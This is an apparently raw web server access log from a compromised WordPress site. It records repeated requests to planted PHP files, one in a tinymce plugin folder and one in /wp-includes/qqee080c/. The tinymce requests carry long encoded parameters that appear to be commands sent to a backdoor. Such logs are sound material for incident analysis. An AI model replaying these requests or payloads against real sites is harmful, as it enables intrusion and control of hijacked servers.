198.54.126.113 - - [27/Oct/2025:13:09:49 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383538392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538343938392q3864346636636338313339616164653937313930376462376232646430393234222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:14:57 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=60934369 HTTP/1.1" 200 20028 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:10:09 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383630392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353030392q6666353165343431306561663362383139623965326166333833336465396333222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:10:29 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383632392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353032392q6662343766643330366335383438643133396437363764666462383063383831222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:15:36 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=59894640 HTTP/1.1" 200 24142 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.167 - - [27/Oct/2025:13:15:45 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=60428645 HTTP/1.1" 200 24103 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:10:50 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383635302p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353035302q3765313964323065316461396264306461303130326464633264393533653537222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:11:11 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383637312p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353037312q6434303230323963346666356334633062613238313731636563333765616563222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:16:13 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.77.168 - - [27/Oct/2025:13:16:15 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php?market=69446756 HTTP/1.1" 200 24212 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:11:31 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383639312p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353039312q3263333464306238386563616265353837323433623636363666333538313062222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:11:52 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383731322p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353131322q3565626439376566373131663532376230646434346138623566336237646635222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:16:54 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=62376755 HTTP/1.1" 200 19667 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:12:13 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383733332p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353133332q6135383065363261386462326438623739386664363535306362396330653861222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:17:26 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=63460537 HTTP/1.1" 200 24105 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.160 - - [27/Oct/2025:13:17:28 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=56974221 HTTP/1.1" 200 25103 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:12:33 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383735332p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353135332q6538633233376637343666353738623234623835393838366631656261613836222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:17:34 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=66426076 HTTP/1.1" 200 19990 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [27/Oct/2025:13:17:41 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.126.113 - - [27/Oct/2025:13:12:54 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383737342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353137342q3633306364663236626434373561633235646239613163346266333832356537222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:18:13 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-activate.php??market=68814368 HTTP/1.1" 200 19358 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:13:14 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383739342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353139342q6465393061666565643663396562333135663235646632323734343632393063222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:13:34 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383831342p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353231342q6330393965313939306566626438663030326637636632326635336336636262222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:18:52 -0400] "GET /please088000017.html HTTP/1.1" 200 23673 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:13:55 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383833352p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353233352q3665383463353035313136643636383730616338363432653963663631616436222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:19:08 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=57034148 HTTP/1.1" 200 24121 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [27/Oct/2025:13:19:12 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.126.113 - - [27/Oct/2025:13:14:16 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383835362p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353235362q3737636461376130373536386232633861303162346231376136386233386661222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.168 - - [27/Oct/2025:13:19:31 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=69789890 HTTP/1.1" 200 20163 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:14:36 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383837362p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353237362q6363336338303131356163636537393731346332353935353037326637376133222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:19:39 -0400] "GET /?market=59967913 HTTP/1.1" 200 23561 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:14:57 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383839372p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353239372q6134356132376561333934376138616565356266393532313266313135316262222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:20:04 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/networks.php??market=58987128 HTTP/1.1" 200 24460 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.77.168 - - [27/Oct/2025:13:20:10 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=59079466 HTTP/1.1" 200 22474 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:15:18 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383931382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353331382q6164626461306262613034623233353764643365303464653435306232636137222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:20:31 -0400] "GET /alien95?kg=325 HTTP/1.1" 200 19803 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:15:38 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383933382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353333382q3830313364316137346438663731646265613965646236313163346562383265222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
69.197.149.50 - - [27/Oct/2025:13:20:40 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.77.167 - - [27/Oct/2025:13:20:48 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-config-sample.php??market=59069417 HTTP/1.1" 200 20878 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.167 - - [27/Oct/2025:13:20:49 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/dcuiz.php??market=53840975 HTTP/1.1" 200 23005 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.77.167 - - [27/Oct/2025:13:20:51 -0400] "GET /loupe-studio-trs-fwtr?fileloc=/home/nahevttf/public_html/wp-mail.php??market=65992332 HTTP/1.1" 200 24191 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.54.126.113 - - [27/Oct/2025:13:15:58 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383935382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353335382q3763616330333030383264383437373062333437666264643731653466623230222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.167 - - [27/Oct/2025:13:21:15 -0400] "GET /dinos-1161505069-1 HTTP/1.1" 200 19897 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
198.54.126.113 - - [27/Oct/2025:13:16:18 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383937382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353337382q6462366566333063383831343534333062646133623431386562613739393665222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:16:38 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538383939382p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353339382q3861363333343135616235336139666436616535313466656336383636353032222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
198.54.126.113 - - [27/Oct/2025:13:16:59 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538393031392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353431392q6437323232663365643638643032353137633931393162313338666535623363222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
66.249.77.160 - - [27/Oct/2025:13:22:07 -0400] "GET /lung144036849.html HTTP/1.1" 200 23716 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [27/Oct/2025:13:22:09 -0400] "GET /wp-includes/qqee080c/index.php?id=237934 HTTP/1.1" 200 0 "http://emporiumlooks.com/wp-includes/qqee080c/index.php?id=237934" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
198.54.126.113 - - [27/Oct/2025:13:17:19 -0400] "GET /wp-includes/js/tinymce/plugins/media/media/index.php?ARRAY=7o2230223n313736313538393033392p2231223n22687474703n5p2s5p2s7n733633307631336o6s2r636s77626s742r6p61745p2s3s6p633q7068705s636s64655s6n6326743q313736313538353433392q3231363663373863373838366365316232333761613262616166336136373063222p2232223n223738336137656463643764323462626335346438623864653837393634663635222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232342q34382q35352q36372q38302q38352q3330227q HTTP/1.1" 200 0 "-" "-"
